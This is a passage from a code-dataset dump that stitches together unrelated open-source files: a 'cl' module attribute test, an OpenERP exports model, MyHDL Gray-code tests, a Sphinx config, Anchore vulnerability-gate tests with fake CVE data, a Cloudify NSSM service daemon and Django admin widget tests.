'MVC2_BLENDING_ON', 'MVC2_CHROMA_THRESHOLD', 'MVC2_EDGE_THRESHOLD',
'MVC2_ERROR', 'MVC2_LUMA_THRESHOLD', 'NEXT_NOT_AVAILABLE',
'NOISE_MARGIN', 'NONE', 'NUMBER_OF_FRAMES', 'NUMBER_OF_PARAMS',
'ORIENTATION', 'ORIGINAL_FORMAT', 'OpenCompressor',
'OpenDecompressor', 'PARAM_OUT_OF_RANGE', 'PREDICTED', 'PREROLL',
'ParamID', 'ParamNumber', 'ParamType', 'QUALITY_FACTOR',
'QUALITY_LEVEL', 'QueryAlgorithms', 'QueryMaxHeaderSize',
'QueryScheme', 'QuerySchemeFromName', 'RANGE_VALUE', 'RGB', 'RGB332',
'RGB8', 'RGBA', 'RGBX', 'RLE', 'RLE24', 'RTR', 'RTR1',
'RTR_QUALITY_LEVEL', 'SAMPLES_PER_TILE', 'SCHEME_BUSY',
'SCHEME_NOT_AVAILABLE', 'SPEED', 'STEREO_INTERLEAVED',
'STREAM_HEADERS', 'SetDefault', 'SetMax', 'SetMin', 'TILE_THRESHOLD',
'TOP_DOWN', 'ULAW', 'UNCOMPRESSED', 'UNCOMPRESSED_AUDIO',
'UNCOMPRESSED_VIDEO', 'UNKNOWN_SCHEME', 'VIDEO', 'VideoFormatName',
'Y', 'YCbCr', 'YCbCr422', 'YCbCr422DC', 'YCbCr422HC', 'YUV', 'YUV422',
'YUV422DC', 'YUV422HC', '__doc__', '__name__', 'cvt_type', 'error']
# This is a very unobtrusive test for the existence of the cl
# module and all its attributes.
def main():
    # touch all the attributes of cl without doing anything
if verbose:
print 'Touching cl module attributes...'
for attr in clattrs:
if verbose:
print 'touching: ', attr
getattr(cl, attr)
main()
| gpl-2.0 |
vrenaville/ngo-addons-backport | openerp/addons/base/ir/ir_exports.py | 72 | 1721 | # -*- coding: utf-8 -*-
##############################################################################
#
# OpenERP, Open Source Management Solution
# Copyright (C) 2004-2009 Tiny SPRL (<http://tiny.be>).
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
from openerp.osv import fields,osv
class ir_exports(osv.osv):
_name = "ir.exports"
_order = 'name'
_columns = {
'name': fields.char('Export Name', size=128),
'resource': fields.char('Resource', size=128, select=True),
'export_fields': fields.one2many('ir.exports.line', 'export_id',
'Export ID'),
}
ir_exports()
class ir_exports_line(osv.osv):
_name = 'ir.exports.line'
_order = 'id'
_columns = {
'name': fields.char('Field Name', size=64),
'export_id': fields.many2one('ir.exports', 'Export', select=True, ondelete='cascade'),
}
ir_exports_line()
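# Illustrative note (not part of the original module): an ir.exports record
# stores a saved export ("name") against a model ("resource", e.g.
# 'res.partner'), and each ir.exports.line child names one exported field.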
# vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4:
| agpl-3.0 |
josyb/myhdl | cosimulation/test/test_bin2gray.py | 4 | 2691 | import unittest
from unittest import TestCase
from myhdl import Simulation, Signal, delay, intbv, bin
from bin2gray import bin2gray
MAX_WIDTH = 10
def nextLn(Ln):
""" Return Gray code Ln+1, given Ln. """
Ln0 = ['0' + codeword for codeword in Ln]
Ln1 = ['1' + codeword for codeword in Ln]
Ln1.reverse()
return Ln0 + Ln1
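# Quick illustration (not part of the original test file): the reflect-and-
# prefix step above turns the 1-bit code into the standard 2-bit Gray code.
assert nextLn(['0', '1']) == ['00', '01', '11', '10']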
class TestOriginalGrayCode(TestCase):
def testOriginalGrayCode(self):
""" Check that the code is an original Gray code """
Rn = []
def stimulus(B, G, n):
for i in range(2**n):
B.next = intbv(i)
yield delay(10)
Rn.append(bin(G, width=n))
Ln = ['0', '1'] # n == 1
for n in range(2, MAX_WIDTH):
Ln = nextLn(Ln)
del Rn[:]
B = Signal(intbv(1))
G = Signal(intbv(0))
dut = bin2gray(B, G, n)
stim = stimulus(B, G, n)
sim = Simulation(dut, stim)
sim.run(quiet=1)
self.assertEqual(Ln, Rn)
class TestGrayCodeProperties(TestCase):
def testSingleBitChange(self):
""" Check that only one bit changes in successive codewords """
def test(B, G, G_Z, width):
B.next = intbv(0)
yield delay(10)
for i in range(1, 2**width):
G_Z.next = G
B.next = intbv(i)
yield delay(10)
diffcode = bin(G ^ G_Z)
self.assertEqual(diffcode.count('1'), 1)
for width in range(2, MAX_WIDTH):
B = Signal(intbv(1))
G = Signal(intbv(0))
G_Z = Signal(intbv(0))
dut = bin2gray(B, G, width)
check = test(B, G, G_Z, width)
sim = Simulation(dut, check)
sim.run(quiet=1)
def testUniqueCodeWords(self):
""" Check that all codewords occur exactly once """
def test(B, G, width):
actual = []
for i in range(2**width):
B.next = intbv(i)
yield delay(10)
actual.append(int(G))
actual.sort()
expected = list(range(2**width))
self.assertEqual(actual, expected)
for width in range(1, MAX_WIDTH):
B = Signal(intbv(1))
G = Signal(intbv(0))
dut = bin2gray(B, G, width)
check = test(B, G, width)
sim = Simulation(dut, check)
sim.run(quiet=1)
if __name__ == '__main__':
unittest.main()
| lgpl-2.1 |
openstack/futurist | releasenotes/source/conf.py | 1 | 8555 | # -*- coding: utf-8 -*-
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
# implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# This file is execfile()d with the current directory set to its
# containing dir.
#
# Note that not all possible configuration values are present in this
# autogenerated file.
#
# All configuration values have a default; values that are commented out
# serve to show the default.
# If extensions (or modules to document with autodoc) are in another directory,
# add these directories to sys.path here. If the directory is relative to the
# documentation root, use os.path.abspath to make it absolute, like shown here.
# sys.path.insert(0, os.path.abspath('.'))
# -- General configuration ------------------------------------------------
# If your documentation needs a minimal Sphinx version, state it here.
# needs_sphinx = '1.0'
# Add any Sphinx extension module names here, as strings. They can be
# extensions coming with Sphinx (named 'sphinx.ext.*') or your custom
# ones.
extensions = [
'openstackdocstheme',
'reno.sphinxext',
]
# openstackdocstheme options
openstackdocs_repo_name = 'openstack/futurist'
openstackdocs_bug_project = 'futurist'
openstackdocs_bug_tag = ''
# Add any paths that contain templates here, relative to this directory.
templates_path = ['_templates']
# The suffix of source filenames.
source_suffix = '.rst'
# The encoding of source files.
# source_encoding = 'utf-8-sig'
# The master toctree document.
master_doc = 'index'
# General information about the project.
copyright = '2016, futurist Developers'
# Release notes do not need a version number in the title, they
# cover multiple releases.
# The full version, including alpha/beta/rc tags.
release = ''
# The short X.Y version.
version = ''
# The language for content autogenerated by Sphinx. Refer to documentation
# for a list of supported languages.
# language = None
# There are two options for replacing |today|: either, you set today to some
# non-false value, then it is used:
# today = ''
# Else, today_fmt is used as the format for a strftime call.
# today_fmt = '%B %d, %Y'
# List of patterns, relative to source directory, that match files and
# directories to ignore when looking for source files.
exclude_patterns = []
# The reST default role (used for this markup: `text`) to use for all
# documents.
# default_role = None
# If true, '()' will be appended to :func: etc. cross-reference text.
# add_function_parentheses = True
# If true, the current module name will be prepended to all description
# unit titles (such as .. function::).
# add_module_names = True
# If true, sectionauthor and moduleauthor directives will be shown in the
# output. They are ignored by default.
# show_authors = False
# The name of the Pygments (syntax highlighting) style to use.
pygments_style = 'native'
# A list of ignored prefixes for module index sorting.
# modindex_common_prefix = []
# If true, keep warnings as "system message" paragraphs in the built documents.
# keep_warnings = False
# -- Options for HTML output ----------------------------------------------
# The theme to use for HTML and HTML Help pages. See the documentation for
# a list of builtin themes.
html_theme = 'openstackdocs'
# Theme options are theme-specific and customize the look and feel of a theme
# further. For a list of options available for each theme, see the
# documentation.
# html_theme_options = {}
# Add any paths that contain custom themes here, relative to this directory.
# html_theme_path = []
# The name for this set of Sphinx documents. If None, it defaults to
# "<project> v<release> documentation".
# html_title = None
# A shorter title for the navigation bar. Default is the same as html_title.
# html_short_title = None
# The name of an image file (relative to this directory) to place at the top
# of the sidebar.
# html_logo = None
# The name of an image file (within the static path) to use as favicon of the
# docs. This file should be a Windows icon file (.ico) being 16x16 or 32x32
# pixels large.
# html_favicon = None
# Add any paths that contain custom static files (such as style sheets) here,
# relative to this directory. They are copied after the builtin static files,
# so a file named "default.css" will overwrite the builtin "default.css".
html_static_path = ['_static']
# Add any extra paths that contain custom files (such as robots.txt or
# .htaccess) here, relative to this directory. These files are copied
# directly to the root of the documentation.
# html_extra_path = []
# If true, SmartyPants will be used to convert quotes and dashes to
# typographically correct entities.
# html_use_smartypants = True
# Custom sidebar templates, maps document names to template names.
# html_sidebars = {}
# Additional templates that should be rendered to pages, maps page names to
# template names.
# html_additional_pages = {}
# If false, no module index is generated.
# html_domain_indices = True
# If false, no index is generated.
# html_use_index = True
# If true, the index is split into individual pages for each letter.
# html_split_index = False
# If true, links to the reST sources are added to the pages.
# html_show_sourcelink = True
# If true, "Created using Sphinx" is shown in the HTML footer. Default is True.
# html_show_sphinx = True
# If true, "(C) Copyright ..." is shown in the HTML footer. Default is True.
# html_show_copyright = True
# If true, an OpenSearch description file will be output, and all pages will
# contain a <link> tag referring to it. The value of this option must be the
# base URL from which the finished HTML is served.
# html_use_opensearch = ''
# This is the file name suffix for HTML files (e.g. ".xhtml").
# html_file_suffix = None
# Output file base name for HTML help builder.
htmlhelp_basename = 'futuristReleaseNotesDoc'
# -- Options for LaTeX output ---------------------------------------------
# Grouping the document tree into LaTeX files. List of tuples
# (source start file, target name, title,
# author, documentclass [howto, manual, or own class]).
latex_documents = [
('index', 'futuristReleaseNotes.tex',
'futurist Release Notes Documentation',
'futurist Developers', 'manual'),
]
# The name of an image file (relative to this directory) to place at the top of
# the title page.
# latex_logo = None
# For "manual" documents, if this is true, then toplevel headings are parts,
# not chapters.
# latex_use_parts = False
# If true, show page references after internal links.
# latex_show_pagerefs = False
# If true, show URL addresses after external links.
# latex_show_urls = False
# Documents to append as an appendix to all manuals.
# latex_appendices = []
# If false, no module index is generated.
# latex_domain_indices = True
# -- Options for manual page output ---------------------------------------
# One entry per manual page. List of tuples
# (source start file, name, description, authors, manual section).
man_pages = [
('index', 'futuristReleaseNotes',
'futurist Release Notes Documentation',
['futurist Developers'], 1)
]
# If true, show URL addresses after external links.
# man_show_urls = False
# -- Options for Texinfo output -------------------------------------------
# Grouping the document tree into Texinfo files. List of tuples
# (source start file, target name, title, author,
# dir menu entry, description, category)
texinfo_documents = [
('index', 'futuristReleaseNotes',
'futurist Release Notes Documentation',
'futurist Developers', 'futuristReleaseNotes',
'One line description of project.',
'Miscellaneous'),
]
# Documents to append as an appendix to all manuals.
# texinfo_appendices = []
# If false, no module index is generated.
# texinfo_domain_indices = True
# How to display URL addresses: 'footnote', 'no', or 'inline'.
# texinfo_show_urls = 'footnote'
# If true, do not generate a @detailmenu in the "Top" node's menu.
# texinfo_no_detailmenu = False
# -- Options for Internationalization output ------------------------------
locale_dirs = ['locale/']
| apache-2.0 |
anchore/anchore-engine | tests/integration/services/policy_engine/engine/policy/gates/test_vulnerabilities.py | 1 | 5979 | import pytest
from anchore_engine.services.policy_engine.engine.policy.gates.vulnerabilities import (
VulnerabilitiesGate,
UnsupportedDistroTrigger,
FeedOutOfDateTrigger,
VulnerabilityMatchTrigger,
)
from anchore_engine.db import Image, get_thread_scoped_session
from tests.integration.services.policy_engine.engine.policy.gates import GateUnitTest
from anchore_engine.subsys import logger
from tests.integration.services.policy_engine.engine.policy.gates import (
cls_fully_loaded_test_env,
cls_no_feeds_test_env,
)
logger.enable_test_logging()
@pytest.mark.usefixtures("cls_fully_loaded_test_env")
class AnchoreSecGateTest(GateUnitTest):
"""
Test against the debian 8 based "node" image in the test env.
It contains the package:
mercurial 3.1.2-2+deb8u3
Vuln data for testing:
[
{
"Vulnerability": {
"FixedIn": [
{
"VersionFormat": "dpkg",
"NamespaceName": "debian:8",
"Version": "None",
"Name": "mercurial"
}
],
"NamespaceName": "debian:8",
"Link": "https://fake.cve.testing/tracker/CVE-TEST-TEST0",
"Name": "CVE-TEST-TEST0",
"Severity": "Low"
}
},
{
"Vulnerability": {
"FixedIn": [
{
"VersionFormat": "dpkg",
"NamespaceName": "debian:8",
"Version": "3.1.2-2+deb8u3",
"Name": "mercurial"
}
],
"NamespaceName": "debian:8",
"Link": "https://fake.cve.testing/tracker/CVE-TEST-TEST1",
"Name": "CVE-TEST-TEST1",
"Severity": "Medium"
}
},
{
"Vulnerability": {
"FixedIn": [
{
"VersionFormat": "dpkg",
"NamespaceName": "debian:8",
"Version": "3.1.1-2+deb8u3",
"Name": "mercurial"
}
],
"NamespaceName": "debian:8",
"Link": "https://fake.cve.testing/tracker/CVE-TEST-TEST2",
"Name": "CVE-TEST-TEST2",
"Severity": "High"
}
},
{
"Vulnerability": {
"FixedIn": [
{
"VersionFormat": "dpkg",
"NamespaceName": "debian:8",
"Version": "3.1.3-2+deb8u3",
"Name": "mercurial"
}
],
"NamespaceName": "debian:8",
"Link": "https://fake.cve.testing/tracker/CVE-TEST-TEST3",
"Name": "CVE-TEST-TEST3",
"Severity": "Critical"
}
}
]
The debian:8 feed vuln data is purely fake and for testing against this package specifically
"""
gate_clazz = VulnerabilitiesGate
__default_image__ = "node"
def test_unsupported_distro(self):
t, gate, test_context = self.get_initialized_trigger(
UnsupportedDistroTrigger.__trigger_name__
)
db = get_thread_scoped_session()
image = db.query(Image).get(
(self.test_env.get_images_named("busybox")[0][0], "0")
)
test_context = gate.prepare_context(image, test_context)
t.evaluate(image, test_context)
logger.info(("Fired: {}".format(t.fired)))
self.assertEqual(len(t.fired), 1)
def test_feedoutofdate(self):
t, gate, test_context = self.get_initialized_trigger(
FeedOutOfDateTrigger.__trigger_name__, max_days_since_sync="0"
)
test_context = gate.prepare_context(self.test_image, test_context)
t.evaluate(self.test_image, test_context)
logger.info(("Fired: {}".format(t.fired)))
self.assertEqual(len(t.fired), 1)
t, gate, test_context = self.get_initialized_trigger(
FeedOutOfDateTrigger.__trigger_name__, max_days_since_sync="1000000"
)
test_context = gate.prepare_context(self.test_image, test_context)
t.evaluate(self.test_image, test_context)
logger.info(("Fired: {}".format(t.fired)))
self.assertEqual(len(t.fired), 0)
def test_all_severity(self):
t, gate, test_context = self.get_initialized_trigger(
VulnerabilityMatchTrigger.__trigger_name__,
package_type="all",
severity="unknown",
severity_comparison=">=",
)
test_context = gate.prepare_context(self.test_image, test_context)
t.evaluate(self.test_image, test_context)
logger.info("Fired: {}".format(t.fired))
self.assertGreaterEqual(len(t.fired), 1)
def test_packages_severity(self):
t, gate, test_context = self.get_initialized_trigger(
VulnerabilityMatchTrigger.__trigger_name__,
package_type="all",
severity="medium",
severity_comparison=">=",
)
test_context = gate.prepare_context(self.test_image, test_context)
t.evaluate(self.test_image, test_context)
logger.info("Fired: {}".format(t.fired))
# CVE-TEST-TEST3, all others are either already fixed or < medium
self.assertGreaterEqual(len(t.fired), 1)
def test_fixavailableparam(self):
t, gate, test_context = self.get_initialized_trigger(
VulnerabilityMatchTrigger.__trigger_name__,
package_type="all",
severity="medium",
severity_comparison=">=",
fix_available="True",
)
test_context = gate.prepare_context(self.test_image, test_context)
t.evaluate(self.test_image, test_context)
logger.info("Fired: {}".format(t.fired))
# CVE-TEST-TEST3
self.assertGreaterEqual(len(t.fired), 1)
t, gate, test_context = self.get_initialized_trigger(
VulnerabilityMatchTrigger.__trigger_name__,
fix_available="False",
severity="unknown",
severity_comparison=">=",
package_type="all",
)
test_context = gate.prepare_context(self.test_image, test_context)
t.evaluate(self.test_image, test_context)
logger.info("Fired: {}".format(t.fired))
# CVE-TEST-TEST0
self.assertGreaterEqual(len(t.fired), 1)
| apache-2.0 |
codilime/cloudify-agent | cloudify_agent/api/pm/nssm.py | 1 | 7393 | #########
# Copyright (c) 2015 GigaSpaces Technologies Ltd. All rights reserved
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# * See the License for the specific language governing permissions and
# * limitations under the License.
import os
from cloudify.exceptions import CommandExecutionException
from cloudify_agent import VIRTUALENV
from cloudify_agent.api import defaults
from cloudify_agent.api import exceptions
from cloudify_agent.api import utils
from cloudify_agent.api.pm.base import Daemon
class NonSuckingServiceManagerDaemon(Daemon):
"""
Implementation for the nssm windows service management.
    Based on the nssm service manager; see https://nssm.cc/
Following are all possible custom key-word arguments
(in addition to the ones available in the base daemon)
``startup_policy``
Specifies the start type for the service.
        Possible values are:
boot - A device driver that is loaded by the boot loader.
system - A device driver that is started during kernel
initialization
auto - A service that automatically starts each time the
computer is restarted and runs even if no one logs on to
the computer.
demand - A service that must be manually started. This is the
default value if start= is not specified.
disabled - A service that cannot be started. To start a disabled
service, change the start type to some other value.
``failure_reset_timeout``
Specifies the length of the period (in seconds) with no failures
after which the failure count should be reset to 0.
``failure_restart_delay``
Specifies delay time (in milliseconds) for the restart action.
"""
PROCESS_MANAGEMENT = 'nssm'
RUNNING_STATES = ['SERVICE_RUNNING', 'SERVICE_STOP_PENDING']
def __init__(self, logger=None, **params):
super(NonSuckingServiceManagerDaemon, self).__init__(
logger=logger, **params)
self.config_path = os.path.join(
self.workdir,
'{0}.conf.bat'.format(self.name))
self.nssm_path = utils.get_absolute_resource_path(
os.path.join('pm', 'nssm', 'nssm.exe'))
self.startup_policy = params.get('startup_policy', 'auto')
self.failure_reset_timeout = params.get('failure_reset_timeout', 60)
self.failure_restart_delay = params.get('failure_restart_delay', 5000)
def create_script(self):
pass
def create_config(self):
env_string = self._create_env_string()
# creating the installation script
self._logger.debug('Rendering configuration script "{0}" from template'
.format(self.config_path))
utils.render_template_to_file(
template_path='pm/nssm/nssm.conf.template',
file_path=self.config_path,
queue=self.queue,
nssm_path=self.nssm_path,
log_level=self.log_level,
log_file=self.get_logfile(),
workdir=self.workdir,
user=self.user,
rest_host=self.rest_host,
rest_port=self.rest_port,
rest_protocol=self.rest_protocol,
file_server_host=self.file_server_host,
file_server_port=self.file_server_port,
file_server_protocol=self.file_server_protocol,
security_enabled=self.security_enabled,
verify_rest_certificate=self.verify_rest_certificate,
local_rest_cert_file=self.local_rest_cert_file,
rest_cert_content=self.rest_cert_content,
broker_url=self.broker_url,
min_workers=self.min_workers,
max_workers=self.max_workers,
virtualenv_path=VIRTUALENV,
name=self.name,
storage_dir=utils.internal.get_storage_directory(self.user),
custom_environment=env_string,
startup_policy=self.startup_policy,
failure_reset_timeout=self.failure_reset_timeout,
failure_restart_delay=self.failure_restart_delay
)
self._logger.debug('Rendered configuration script: {0}'.format(
self.config_path))
# run the configuration script
self._logger.info('Running configuration script')
self._runner.run(self.config_path)
self._logger.debug('Successfully executed configuration script')
def before_self_stop(self):
if self.startup_policy in ['boot', 'system', 'auto']:
self._logger.debug('Disabling service: {0}'.format(self.name))
self._runner.run('sc config {0} start= disabled'.format(self.name))
def delete(self, force=defaults.DAEMON_FORCE_DELETE):
if self._is_agent_registered():
if not force:
raise exceptions.DaemonStillRunningException(self.name)
self.stop()
self._logger.info('Removing {0} service'.format(
self.name))
self._runner.run('{0} remove {1} confirm'.format(
self.nssm_path,
self.name))
self._logger.debug('Deleting {0}'.format(self.config_path))
if os.path.exists(self.config_path):
os.remove(self.config_path)
def start_command(self):
if not os.path.isfile(self.config_path):
raise exceptions.DaemonNotConfiguredError(self.name)
return 'sc start {0}'.format(self.name)
def stop_command(self):
return 'sc stop {0}'.format(self.name)
def status(self):
try:
command = '{0} status {1}'.format(self.nssm_path, self.name)
response = self._runner.run(command)
            # apparently nssm output is encoded in utf16;
            # re-encode it as utf-8 so the state string can be compared
state = response.std_out.decode('utf16').encode(
'utf-8').rstrip()
self._logger.info(state)
if state in self.RUNNING_STATES:
return True
else:
return False
except CommandExecutionException as e:
self._logger.debug(str(e))
return False
def get_worker_id_placeholder(self):
"""
        Returns a placeholder suitable for Windows systems.
        Due to a bug in Celery, the %I placeholder does not work
        properly on NT systems.
"""
return '{0}'
def _create_env_string(self):
env_string = ''
if self.extra_env_path and os.path.exists(self.extra_env_path):
with open(self.extra_env_path) as f:
content = f.read()
for line in content.splitlines():
if line.startswith('set'):
parts = line.split(' ')[1].split('=')
key = parts[0]
value = parts[1]
env_string = '{0} {1}={2}'.format(env_string, key, value)
return env_string.rstrip()
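# A minimal standalone sketch (not part of the original module) of the batch-
# file parsing done by _create_env_string() above: 'set KEY=VALUE' lines are
# collapsed into a single 'KEY=VALUE KEY2=VALUE2' string. The input below is
# hypothetical.
if __name__ == '__main__':
    demo = 'rem comment\nset FOO=1\nset BAR=baz'
    env_string = ''
    for line in demo.splitlines():
        if line.startswith('set'):
            key, value = line.split(' ')[1].split('=', 1)
            env_string = '{0} {1}={2}'.format(env_string, key, value)
    print(repr(env_string.rstrip()))  # -> ' FOO=1 BAR=baz' (leading space kept)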
| apache-2.0 |
ghickman/django | tests/admin_widgets/tests.py | 2 | 58590 | # -*- coding: utf-8 -*-
from __future__ import unicode_literals
import gettext
import os
from datetime import datetime, timedelta
from importlib import import_module
from unittest import skipIf
from django import forms
from django.conf import settings
from django.contrib import admin
from django.contrib.admin import widgets
from django.contrib.admin.tests import AdminSeleniumWebDriverTestCase
from django.contrib.auth.models import User
from django.core.files.storage import default_storage
from django.core.files.uploadedfile import SimpleUploadedFile
from django.core.urlresolvers import reverse
from django.db.models import CharField, DateField
from django.test import SimpleTestCase, TestCase, override_settings
from django.utils import six, translation
from . import models
from .widgetadmin import site as widget_admin_site
try:
import pytz
except ImportError:
pytz = None
class TestDataMixin(object):
@classmethod
def setUpTestData(cls):
cls.u1 = User.objects.create(
pk=100, username='super', first_name='Super', last_name='User', email='[email protected]',
password='sha1$995a3$6011485ea3834267d719b4c801409b8b1ddd0158', is_active=True, is_superuser=True,
is_staff=True, last_login=datetime(2007, 5, 30, 13, 20, 10),
date_joined=datetime(2007, 5, 30, 13, 20, 10)
)
cls.u2 = User.objects.create(
pk=101, username='testser', first_name='Add', last_name='User', email='[email protected]',
password='sha1$995a3$6011485ea3834267d719b4c801409b8b1ddd0158', is_active=True, is_superuser=False,
is_staff=True, last_login=datetime(2007, 5, 30, 13, 20, 10),
date_joined=datetime(2007, 5, 30, 13, 20, 10)
)
models.Car.objects.create(id=1, owner=cls.u1, make='Volkswagen', model='Passat')
models.Car.objects.create(id=2, owner=cls.u2, make='BMW', model='M3')
class SeleniumDataMixin(object):
def setUp(self):
self.u1 = User.objects.create(
pk=100, username='super', first_name='Super', last_name='User', email='[email protected]',
password='sha1$995a3$6011485ea3834267d719b4c801409b8b1ddd0158', is_active=True, is_superuser=True,
is_staff=True, last_login=datetime(2007, 5, 30, 13, 20, 10),
date_joined=datetime(2007, 5, 30, 13, 20, 10)
)
class AdminFormfieldForDBFieldTests(SimpleTestCase):
"""
Tests for correct behavior of ModelAdmin.formfield_for_dbfield
"""
def assertFormfield(self, model, fieldname, widgetclass, **admin_overrides):
"""
Helper to call formfield_for_dbfield for a given model and field name
and verify that the returned formfield is appropriate.
"""
# Override any settings on the model admin
class MyModelAdmin(admin.ModelAdmin):
pass
for k in admin_overrides:
setattr(MyModelAdmin, k, admin_overrides[k])
# Construct the admin, and ask it for a formfield
ma = MyModelAdmin(model, admin.site)
ff = ma.formfield_for_dbfield(model._meta.get_field(fieldname), request=None)
# "unwrap" the widget wrapper, if needed
if isinstance(ff.widget, widgets.RelatedFieldWidgetWrapper):
widget = ff.widget.widget
else:
widget = ff.widget
# Check that we got a field of the right type
self.assertTrue(
isinstance(widget, widgetclass),
"Wrong widget for %s.%s: expected %s, got %s" % (
model.__class__.__name__,
fieldname,
widgetclass,
type(widget),
)
)
# Return the formfield so that other tests can continue
return ff
def test_DateField(self):
self.assertFormfield(models.Event, 'start_date', widgets.AdminDateWidget)
def test_DateTimeField(self):
self.assertFormfield(models.Member, 'birthdate', widgets.AdminSplitDateTime)
def test_TimeField(self):
self.assertFormfield(models.Event, 'start_time', widgets.AdminTimeWidget)
def test_TextField(self):
self.assertFormfield(models.Event, 'description', widgets.AdminTextareaWidget)
def test_URLField(self):
self.assertFormfield(models.Event, 'link', widgets.AdminURLFieldWidget)
def test_IntegerField(self):
self.assertFormfield(models.Event, 'min_age', widgets.AdminIntegerFieldWidget)
def test_CharField(self):
self.assertFormfield(models.Member, 'name', widgets.AdminTextInputWidget)
def test_EmailField(self):
self.assertFormfield(models.Member, 'email', widgets.AdminEmailInputWidget)
def test_FileField(self):
self.assertFormfield(models.Album, 'cover_art', widgets.AdminFileWidget)
def test_ForeignKey(self):
self.assertFormfield(models.Event, 'main_band', forms.Select)
def test_raw_id_ForeignKey(self):
self.assertFormfield(models.Event, 'main_band', widgets.ForeignKeyRawIdWidget,
raw_id_fields=['main_band'])
def test_radio_fields_ForeignKey(self):
ff = self.assertFormfield(models.Event, 'main_band', widgets.AdminRadioSelect,
radio_fields={'main_band': admin.VERTICAL})
self.assertEqual(ff.empty_label, None)
def test_many_to_many(self):
self.assertFormfield(models.Band, 'members', forms.SelectMultiple)
def test_raw_id_many_to_many(self):
self.assertFormfield(models.Band, 'members', widgets.ManyToManyRawIdWidget,
raw_id_fields=['members'])
def test_filtered_many_to_many(self):
self.assertFormfield(models.Band, 'members', widgets.FilteredSelectMultiple,
filter_vertical=['members'])
def test_formfield_overrides(self):
self.assertFormfield(models.Event, 'start_date', forms.TextInput,
formfield_overrides={DateField: {'widget': forms.TextInput}})
def test_formfield_overrides_widget_instances(self):
"""
Test that widget instances in formfield_overrides are not shared between
different fields. (#19423)
"""
class BandAdmin(admin.ModelAdmin):
formfield_overrides = {
CharField: {'widget': forms.TextInput(attrs={'size': '10'})}
}
ma = BandAdmin(models.Band, admin.site)
f1 = ma.formfield_for_dbfield(models.Band._meta.get_field('name'), request=None)
f2 = ma.formfield_for_dbfield(models.Band._meta.get_field('style'), request=None)
self.assertNotEqual(f1.widget, f2.widget)
self.assertEqual(f1.widget.attrs['maxlength'], '100')
self.assertEqual(f2.widget.attrs['maxlength'], '20')
self.assertEqual(f2.widget.attrs['size'], '10')
def test_field_with_choices(self):
self.assertFormfield(models.Member, 'gender', forms.Select)
def test_choices_with_radio_fields(self):
self.assertFormfield(models.Member, 'gender', widgets.AdminRadioSelect,
radio_fields={'gender': admin.VERTICAL})
def test_inheritance(self):
self.assertFormfield(models.Album, 'backside_art', widgets.AdminFileWidget)
def test_m2m_widgets(self):
"""m2m fields help text as it applies to admin app (#9321)."""
class AdvisorAdmin(admin.ModelAdmin):
filter_vertical = ['companies']
self.assertFormfield(models.Advisor, 'companies', widgets.FilteredSelectMultiple,
filter_vertical=['companies'])
ma = AdvisorAdmin(models.Advisor, admin.site)
f = ma.formfield_for_dbfield(models.Advisor._meta.get_field('companies'), request=None)
self.assertEqual(
six.text_type(f.help_text),
'Hold down "Control", or "Command" on a Mac, to select more than one.'
)
@override_settings(PASSWORD_HASHERS=['django.contrib.auth.hashers.SHA1PasswordHasher'],
ROOT_URLCONF='admin_widgets.urls')
class AdminFormfieldForDBFieldWithRequestTests(TestDataMixin, TestCase):
def test_filter_choices_by_request_user(self):
"""
Ensure the user can only see their own cars in the foreign key dropdown.
"""
self.client.login(username="super", password="secret")
response = self.client.get(reverse('admin:admin_widgets_cartire_add'))
self.assertNotContains(response, "BMW M3")
self.assertContains(response, "Volkswagen Passat")
@override_settings(PASSWORD_HASHERS=['django.contrib.auth.hashers.SHA1PasswordHasher'],
ROOT_URLCONF='admin_widgets.urls')
class AdminForeignKeyWidgetChangeList(TestDataMixin, TestCase):
def setUp(self):
self.client.login(username="super", password="secret")
def test_changelist_ForeignKey(self):
response = self.client.get(reverse('admin:admin_widgets_car_changelist'))
self.assertContains(response, '/auth/user/add/')
@override_settings(PASSWORD_HASHERS=['django.contrib.auth.hashers.SHA1PasswordHasher'],
ROOT_URLCONF='admin_widgets.urls')
class AdminForeignKeyRawIdWidget(TestDataMixin, TestCase):
def setUp(self):
self.client.login(username="super", password="secret")
def test_nonexistent_target_id(self):
band = models.Band.objects.create(name='Bogey Blues')
pk = band.pk
band.delete()
post_data = {
"main_band": '%s' % pk,
}
# Try posting with a non-existent pk in a raw id field: this
# should result in an error message, not a server exception.
response = self.client.post(reverse('admin:admin_widgets_event_add'), post_data)
self.assertContains(response,
'Select a valid choice. That choice is not one of the available choices.')
def test_invalid_target_id(self):
for test_str in ('Iñtërnâtiônàlizætiøn', "1234'", -1234):
# This should result in an error message, not a server exception.
response = self.client.post(reverse('admin:admin_widgets_event_add'),
{"main_band": test_str})
self.assertContains(response,
'Select a valid choice. That choice is not one of the available choices.')
def test_url_params_from_lookup_dict_any_iterable(self):
lookup1 = widgets.url_params_from_lookup_dict({'color__in': ('red', 'blue')})
lookup2 = widgets.url_params_from_lookup_dict({'color__in': ['red', 'blue']})
self.assertEqual(lookup1, {'color__in': 'red,blue'})
self.assertEqual(lookup1, lookup2)
def test_url_params_from_lookup_dict_callable(self):
def my_callable():
return 'works'
lookup1 = widgets.url_params_from_lookup_dict({'myfield': my_callable})
lookup2 = widgets.url_params_from_lookup_dict({'myfield': my_callable()})
self.assertEqual(lookup1, lookup2)
class FilteredSelectMultipleWidgetTest(SimpleTestCase):
def test_render(self):
